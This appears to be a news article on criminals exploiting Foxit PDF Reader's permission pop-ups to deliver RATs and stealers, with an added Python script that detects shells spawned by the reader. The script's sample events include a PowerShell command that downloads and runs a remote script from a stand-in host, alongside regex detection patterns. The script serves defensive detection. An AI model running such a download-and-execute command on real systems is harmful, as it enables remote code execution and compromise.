Criminals Targeting Foxit PDF Reader Users in Attempt to Steal Sensitive Data

A critical security flaw in Foxit Reader, a lesser-known PDF viewer, has been exploited by cybercriminals to trick users into executing malicious code, potentially compromising their systems and data. The flaw lies in the design of the warning messages presented to users, with a default “OK” option that can easily deceive unsuspecting individuals into clicking it without fully understanding the consequences.

The exploit allows attackers to remotely download and execute malicious code, granting them unauthorized access to the victim’s device. This vulnerability has been actively exploited in real-world attacks for malicious purposes such as espionage and e-crime.

Recent reports suggest that an advanced persistent threat group known as APT-C-35 (DoNot Team) is behind a major exploit campaign targeting both Windows and Android users. The attackers utilize the PDF exploit to deploy various malware families, including VenomRAT, Agent-Tesla, Remcos, NjRAT, NanoCore RAT, Pony, Xworm, AsyncRAT, and DCRat. These malware variants enable cybercriminals to control compromised devices and potentially bypass two-factor authentication (2FA) mechanisms, posing a serious threat to users’ security and privacy.

Researchers at Check Point Research have uncovered an attack campaign, possibly distributed through Facebook, that uses a multi-stage attack chain. In this campaign, a victim who clicks a malicious link ends up with an information stealer and two cryptocurrency miners installed on their machine.

In another incident, a threat actor known as @silentkillertv was found to be using two linked PDF files, one hosted on the legitimate website Trello, to deliver malware. This actor was also observed selling malicious tools and advertising the exploit on April 27th, highlighting the growing trend of cybercriminals leveraging PDF vulnerabilities for malicious purposes.

Furthermore, researchers have identified builder tools used by attackers to generate malicious PDFs exploiting the Foxit Reader vulnerability. These PDFs primarily deliver PowerShell payloads by downloading them from a remote server and executing them on the target machine. The flexibility of these builder tools indicates a wide range of commands that attackers can leverage to carry out their malicious activities.
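The delivery pattern described above (a PDF reader that ends up running a PowerShell download-and-execute stage) is visible in process-creation telemetry. The following detection sketch is an added example, not code from the article or from Check Point Research; the Foxit image names, the install path, the event field names and the sample events are assumptions constructed for illustration.

```python
import re

# Assumed Foxit process image names; adjust to the builds deployed in your estate.
READER_IMAGES = {"foxitpdfreader.exe", "foxitreader.exe"}
# Interpreters a PDF viewer has no routine reason to start.
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Command-line traits of a download-and-execute stage.
DOWNLOAD_HINTS = re.compile(
    r"https?://|downloadstring|downloadfile|invoke-webrequest|\biwr\b|-enc(odedcommand)?\b",
    re.IGNORECASE,
)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect(events):
    """Flag shells descended from a PDF reader. Events must be in time order;
    PID reuse is ignored for brevity."""
    readers, tainted, alerts = set(), set(), []
    for ev in events:
        name = basename(ev["image"])
        if name in READER_IMAGES:
            readers.add(ev["pid"])
        elif ev["ppid"] in readers or ev["ppid"] in tainted:
            tainted.add(ev["pid"])  # keep following the lineage (cmd -> powershell)
            if name in SHELL_IMAGES:
                remote = DOWNLOAD_HINTS.search(ev["command_line"])
                alerts.append((ev["pid"], name, "high" if remote else "medium"))
    return alerts

# Constructed process-creation events (not from the article or any real incident).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "command_line": "explorer.exe"},
    {"pid": 200, "ppid": 100, "command_line": "FoxitPDFReader.exe invoice.pdf",
     "image": r"C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c stage.bat"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://files.example.test/s.ps1')\""},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-ChildItem"},
    {"pid": 600, "ppid": 200, "image": r"C:\Windows\splwow64.exe", "command_line": "splwow64.exe 8192"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The same lineage rule translates directly to an EDR or SIEM query keyed on parent image and child image, with the command-line pattern used only to raise severity.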

Unlike traditional exploits that target well-known software like Adobe Reader, this exploit in Foxit Reader relies heavily on social engineering to manipulate users into clicking “OK” on permission pop-ups. The technique has evaded detection for years because security solutions focus on more popular PDF viewers, which has allowed malicious PDFs to be distributed easily and to circumvent traditional security measures.

Foxit has acknowledged the issue and plans to address it in a future update. In the meantime, users are advised to exercise caution when opening PDF files and to avoid clicking on suspicious links or pop-ups. Keeping software and security solutions up to date is crucial to protect against emerging threats and vulnerabilities in the cyber landscape.
